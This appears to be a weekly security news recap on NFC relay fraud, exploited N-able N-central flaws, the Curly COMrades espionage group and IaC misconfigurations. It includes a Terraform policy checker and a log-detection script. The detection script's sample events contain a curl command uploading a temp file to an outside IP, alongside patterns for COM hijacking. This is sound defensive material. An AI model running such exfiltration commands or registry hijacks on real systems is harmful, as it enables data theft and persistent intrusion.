⚡ Weekly Recap: NFC Fraud Trends, Curly COMrades Insights, N-able Vulnerabilities, Docker Backdoor Threats & More
Power does not simply vanish in a single breach; it gradually erodes through overlooked details—a missed patch, an incorrect setting, or an unmonitored system. Security failures typically do not occur all at once; they deteriorate slowly before culminating in a sudden collapse. Maintaining safety is less about possessing exhaustive knowledge and more about responding swiftly and decisively to prevent issues from accumulating. Clarity fosters control, while hesitation introduces risk. This week’s signals highlight critical areas where immediate action is essential.
The Threat of the Week involves Ghost Tap NFC-Based Mobile Fraud, with a new Android trojan named PhantomCard exploiting near-field communication (NFC) to execute relay attacks targeting banking customers in Brazil. In these incidents, users who install the malicious applications are prompted to place their credit or debit card on the back of their phone for verification. However, the card data is transmitted to an attacker-controlled NFC relay server. The stolen information is then relayed to money mules, who link it to contactless payment systems such as Apple Pay or Google Pay to acquire physical goods. Additionally, the importance of addressing Infrastructure-as-Code (IaC) misconfigurations is emphasised, as even minor errors can lead to significant production risks. A best practices guide is available to assist in rectifying these misconfigurations from the outset, ensuring a secure cloud environment.
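The recap's point about IaC misconfigurations is that the dangerous settings are small and easy to miss in review, so they are best caught by an automated policy check before anything is applied. The block below is an added example written for this recap, not code from the best practices guide it mentions or from any vendor: a minimal checker that walks a constructed Terraform JSON-syntax (`.tf.json`) document and flags three classic mistakes (a public S3 bucket ACL, a missing or incomplete public-access block, and an admin port open to the whole Internet). The resource shapes follow the AWS provider, but the sample documents, the allow/deny thresholds and the `check_iac` function name are assumptions for the example.

```python
"""Added example: a tiny IaC policy check over Terraform JSON syntax.
The WEAK and HARDENED documents below are constructed for illustration."""
import json
import re

PUBLIC_ACLS = {"public-read", "public-read-write", "authenticated-read"}
PAB_FLAGS = ("block_public_acls", "block_public_policy",
             "ignore_public_acls", "restrict_public_buckets")
ADMIN_PORTS = {22, 3389}            # SSH and RDP; extend as needed
ANY_CIDR = {"0.0.0.0/0", "::/0"}

# Constructed weak configuration: the "minor errors" the recap talks about.
WEAK_TF_JSON = json.dumps({"resource": {
    "aws_s3_bucket": {"logs": {"bucket": "example-logs", "acl": "public-read"}},
    "aws_s3_bucket_public_access_block": {"logs": {
        "bucket": "${aws_s3_bucket.logs.id}",
        "block_public_acls": False, "restrict_public_buckets": False}},
    "aws_security_group": {"admin": {"name": "admin", "ingress": [
        {"from_port": 22, "to_port": 22, "protocol": "tcp",
         "cidr_blocks": ["0.0.0.0/0"]}]}},
}})

# The same resources with the settings corrected.
HARDENED_TF_JSON = json.dumps({"resource": {
    "aws_s3_bucket": {"logs": {"bucket": "example-logs", "acl": "private"}},
    "aws_s3_bucket_public_access_block": {"logs": {
        "bucket": "${aws_s3_bucket.logs.id}",
        **{flag: True for flag in PAB_FLAGS}}},
    "aws_security_group": {"admin": {"name": "admin", "ingress": [
        {"from_port": 22, "to_port": 22, "protocol": "tcp",
         "cidr_blocks": ["10.0.0.0/8"]}]}},
}})


def _resources(doc, rtype):
    """Yield (label, body) pairs for one resource type in a .tf.json document."""
    return doc.get("resource", {}).get(rtype, {}).items()


def check_iac(tf_json_text):
    """Return a list of human-readable findings; an empty list means clean."""
    doc = json.loads(tf_json_text)
    findings = []

    # 1. Bucket ACLs that grant anonymous or any-authenticated-user access.
    for label, body in _resources(doc, "aws_s3_bucket"):
        if body.get("acl") in PUBLIC_ACLS:
            findings.append(f"aws_s3_bucket.{label}: public ACL {body['acl']!r}")

    # 2. Every bucket needs a public-access block with all four flags on.
    #    Blocks are matched to buckets via the "${aws_s3_bucket.<label>.id}" reference.
    blocks = {}
    for label, body in _resources(doc, "aws_s3_bucket_public_access_block"):
        ref = re.fullmatch(r"\$\{aws_s3_bucket\.(\w+)\.id\}", str(body.get("bucket", "")))
        blocks[ref.group(1) if ref else label] = body
    for label, _ in _resources(doc, "aws_s3_bucket"):
        pab = blocks.get(label)
        if pab is None:
            findings.append(f"aws_s3_bucket.{label}: no aws_s3_bucket_public_access_block")
            continue
        off = [f for f in PAB_FLAGS if pab.get(f) is not True]   # missing counts as off
        if off:
            findings.append(f"aws_s3_bucket.{label}: public access block leaves {', '.join(off)} off")

    # 3. Ingress rules that expose an admin port to every address.
    for label, body in _resources(doc, "aws_security_group"):
        for rule in body.get("ingress", []):
            cidrs = set(rule.get("cidr_blocks", [])) | set(rule.get("ipv6_cidr_blocks", []))
            if not cidrs & ANY_CIDR:
                continue
            if str(rule.get("protocol")) == "-1":          # "-1" means all ports
                lo, hi = 0, 65535
            else:
                lo, hi = int(rule.get("from_port", 0)), int(rule.get("to_port", 65535))
            exposed = sorted(p for p in ADMIN_PORTS if lo <= p <= hi)
            if exposed:
                findings.append(f"aws_security_group.{label}: ports {exposed} open to {sorted(cidrs & ANY_CIDR)}")
    return findings


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_TF_JSON), ("hardened", HARDENED_TF_JSON)):
        print(f"{name}: {check_iac(doc) or 'no findings'}")
```

Run it and the weak document yields three findings while the hardened one yields none; wired into a pre-apply pipeline step, a non-empty list is the signal to stop the deployment rather than fix it in production later.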
In Top News, two security flaws affecting N-able N-central have been actively exploited in the wild. The vulnerabilities, CVE-2025-8875 and CVE-2025-8876, permit command execution and command injection, respectively. These issues have been resolved in N-central versions 2025.3.1 and 2024.6 HF2, released on August 13, 2025. N-able has urged customers to enable multi-factor authentication (MFA), particularly for administrative accounts. Furthermore, a new Advanced Persistent Threat (APT) group, dubbed Curly COMrades, has been identified targeting entities in Georgia and Moldova as part of a cyber espionage campaign aimed at establishing long-term access to targeted networks. This activity, monitored by a Romanian cybersecurity firm since mid-2024, has focused on judicial and government bodies in Georgia, as well as an energy distribution company in Moldova. Curly COMrades are believed to operate in alignment with Russia’s geopolitical objectives, deriving their name from their heavy reliance on the curl utility for command-and-control (C2) and data transfer, alongside the hijacking of Component Object Model (COM) objects. Persistent access to infected endpoints is achieved through a bespoke backdoor.
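Two behaviours from the Curly COMrades description are cheap to hunt for on endpoints: curl being used to push data to hosts the organisation does not talk to, and COM object hijacking, which classically works by writing a server path under a user's `Software\Classes\CLSID` hive so it shadows the machine-wide registration. The block below is an added detection sketch written for this recap, not tooling from the Romanian firm that tracks the group or from any vendor. It runs two rules over a handful of constructed JSON log events in a Sysmon-like shape (process creation and registry value set); the event field names, the host allowlist, the GUID and the addresses are all constructed for the example.

```python
"""Added example: two endpoint-log detections motivated by the Curly COMrades
write-up. Events, hosts, GUID and field names are constructed, not real telemetry."""
import json
import re
import shlex
from urllib.parse import urlsplit

# Switches that make curl send a body or a file rather than just fetch.
UPLOAD_FLAGS = {"-d", "--data", "--data-binary", "--data-raw", "--data-urlencode",
                "-F", "--form", "-T", "--upload-file"}
# Assumed allowlist of hosts the fleet is expected to reach with curl.
ALLOWED_HOSTS = {"updates.example-corp.internal"}
# User-hive COM server registration: HKU\<SID>\Software\Classes\CLSID\{GUID}\InprocServer32 etc.
COM_HIJACK_RE = re.compile(
    r"^HK(?:U|CU)\\.*\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]{36}\}"
    r"\\(?:InprocServer32|LocalServer32|TreatAs)", re.IGNORECASE)

# Constructed sample events (Sysmon-like: process creation and registry value set).
SAMPLE_EVENTS = [
    {"event": "process_create", "pid": 4120, "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -s -X POST --data-binary @C:\Users\u\AppData\Local\Temp\a.bin https://203.0.113.10/up"},
    {"event": "process_create", "pid": 4131, "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Program Files\Updater\updater.exe",
     "cmdline": "curl.exe -sS https://updates.example-corp.internal/manifest.json"},
    {"event": "registry_set", "pid": 4120,
     "target": r"HKU\S-1-5-21-111-222-333-1001\Software\Classes\CLSID\{D6F1C2A3-4B5E-4F60-9A7B-1C2D3E4F5A6B}\InprocServer32\(Default)",
     "details": r"C:\Users\u\AppData\Roaming\x.dll"},
    {"event": "registry_set", "pid": 900,
     "target": r"HKLM\Software\Classes\CLSID\{D6F1C2A3-4B5E-4F60-9A7B-1C2D3E4F5A6B}\InprocServer32\(Default)",
     "details": r"C:\Program Files\Vendor\component.dll"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]


def _tokens(cmdline):
    # posix=False keeps Windows backslashes literal instead of treating them as escapes.
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def _url_hosts(tokens):
    return [urlsplit(t).hostname or "" for t in tokens
            if t.lower().startswith(("http://", "https://"))]


def detect(lines):
    """Return one alert dict per matching event, in log order."""
    alerts = []
    for raw in lines:
        ev = json.loads(raw)
        if ev["event"] == "process_create" and ev["image"].lower().endswith("\\curl.exe"):
            toks = _tokens(ev["cmdline"])
            uploads = UPLOAD_FLAGS & set(toks)          # plain token match; combined short flags not handled
            unlisted = [h for h in _url_hosts(toks) if h not in ALLOWED_HOSTS]
            if uploads and unlisted:
                alerts.append({"rule": "curl_upload_to_unlisted_host", "pid": ev["pid"],
                               "host": unlisted[0], "flags": sorted(uploads)})
        elif ev["event"] == "registry_set" and COM_HIJACK_RE.match(ev["target"]):
            alerts.append({"rule": "user_hive_com_server_override", "pid": ev["pid"],
                           "key": ev["target"], "value": ev.get("details")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Only the first and third events fire: the allowlisted fetch and the machine-hive registration made by an installer are left alone. The second rule is deliberately narrow to user hives because that is where a low-privileged account can shadow a system COM class; in practice you would join the registry hit back to the writing process (the shared `pid` here) and check whether the referenced DLL path sits under a user-writable directory.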
Categories: Cybersecurity Threats, Cloud Security Best Practices, Vulnerability Exploitation
Tags: Power, Security, Fraud, Malware, NFC, Misconfigurations, Authentication, Espionage, Access, Cloud